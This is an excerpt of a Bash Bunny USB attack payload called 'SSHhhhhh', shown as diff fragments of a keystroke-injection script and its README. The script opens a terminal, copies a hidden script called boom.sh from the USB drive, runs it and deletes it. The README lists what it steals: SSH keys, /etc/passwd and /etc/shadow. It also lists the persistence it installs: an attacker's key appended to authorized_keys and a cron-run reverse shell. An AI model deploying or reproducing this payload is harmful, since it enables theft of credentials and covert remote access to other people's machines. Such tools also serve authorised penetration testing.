echo $RSA_KEY >> .ssh/authorized_keys ;
|
||||
fi
|
|
@ -0,0 +1,54 @@
|
|||
# Title: SSHhhhhh
|
||||
# Description: Exfiltrates files from user's .ssh folder to Bash Bunny via USB & adds backdoors
|
||||
# Author: WWVB
|
||||
# Props: Hak5Darren, hak5peaks
|
||||
# Version: 1.1
|
||||
# Category: Exfiltration w/Persistence
|
||||
# Target: Linux Ubuntu 18.04 LTS
|
||||
# Attackmodes: HID, Storage
|
||||
|
||||
DRIVE_LABEL="BashBunny"
|
||||
|
||||
#!/bin/bash
|
||||
|
||||
LED SETUP
|
||||
ATTACKMODE HID STORAGE
|
||||
GET SWITCH_POSITION
|
||||
|
||||
LED STAGE1
|
||||
QUACK DELAY 500
|
||||
QUACK CTRL-ALT t
|
||||
QUACK DELAY 100
|
||||
|
||||
# Drop primary payload on the box
|
||||
QUACK STRING cp /media/\$USER/$DRIVE_LABEL/payloads/$SWITCH_POSITION/boom.sh .
|
||||
QUACK ENTER
|
||||
QUACK DELAY 50
|
||||
|
||||
QUACK STRING chmod +x boom.sh
|
||||
QUACK ENTER
|
||||
QUACK DELAY 50
|
||||
|
||||
LED ATTACK
|
||||
|
||||
# Light the fuse and wait!!
|
||||
QUACK STRING ./boom.sh
|
||||
QUACK ENTER
|
||||
QUACK DELAY 1000
|
||||
|
||||
# Cleanup
|
||||
LED CLEANUP
|
||||
QUACK STRING rm boom.sh
|
||||
QUACK ENTER
|
||||
QUACK DELAY 100
|
||||
|
||||
# Bye Felicia!
|
||||
QUACK STRING umount '/media/$USER/$DRIVE_LABEL'
|
||||
QUACK ENTER
|
||||
QUACK DELAY 25
|
||||
|
||||
QUACK STRING exit
|
||||
QUACK ENTER
|
||||
QUACK DELAY 25
|
||||
|
||||
LED FINISH
|
|
@ -0,0 +1,32 @@
|
|||
# SSHhhhhh
|
||||
|
||||
## Author: WWVB
|
||||
## Version: Version 1.0
|
||||
|
||||
## Description
|
||||
|
||||
## Target = Unlocked Linux machine (only tested on Ubuntu 18.04 LTS)
|
||||
Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not installed, the route command will not return data [nothing major])
|
||||
|
||||
## Loot = Contents of ~/$USER/.ssh folder (pub/priv RSA keys, known_hosts, etc..)
|
||||
whoami
|
||||
|
||||
ip addr
|
||||
|
||||
arp data
|
||||
|
||||
route -n
|
||||
|
||||
/etc/passwd
|
||||
|
||||
/etc/shadow (on the off chance you get a root terminal)
|
||||
|
||||
uname -a
|
||||
|
||||
## Two opportunites for persistence are injected:
|
||||
|
||||
Attacker's RSA key is added to ~/$USER/.ssh/authorized_keys (aka I'll Call You)
|
||||
|
||||
Reverse_TCP shell script is dropped in the ~/$USER/.config folder and a CRON job added that calls it on a schedule (aka Call Me Later)
|
||||
|
||||
## Configuration = HID STORAGE
|
Loading…
Reference in New Issue